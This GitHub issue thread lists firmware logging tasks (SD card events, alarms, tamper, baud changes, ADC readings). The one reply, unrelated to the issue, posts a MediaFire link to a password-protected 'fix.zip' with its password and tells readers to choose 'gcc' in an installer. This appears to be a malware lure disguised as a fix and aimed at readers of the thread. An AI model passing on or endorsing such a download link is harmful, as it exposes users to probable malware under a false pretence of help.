### ISSUE TITLE
Things to log

### ISSUE THREAD

**Issue by AlyBadawy** [AlyBadawy/VexUF_Horus_fw#44]
- [ ] log when card becomes full.
- [ ] log when an sd card is inserted
- [ ] log when sd card title is renamed
- [ ] log when an alarm goes off
- [ ] log when a trigger is trigged
- [ ] log a tamper
- [ ] log a pwm value change
- [ ] log error
- [ ] log warn
- [ ] log info
- [ ] log TTL
- [ ] log CDC
- [ ] log TNC
- [ ] log baud change TTL
- [ ] log baud change TNC
- [ ] log configurations
- [ ] log start up
- [ ] log ADC and temp reading

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
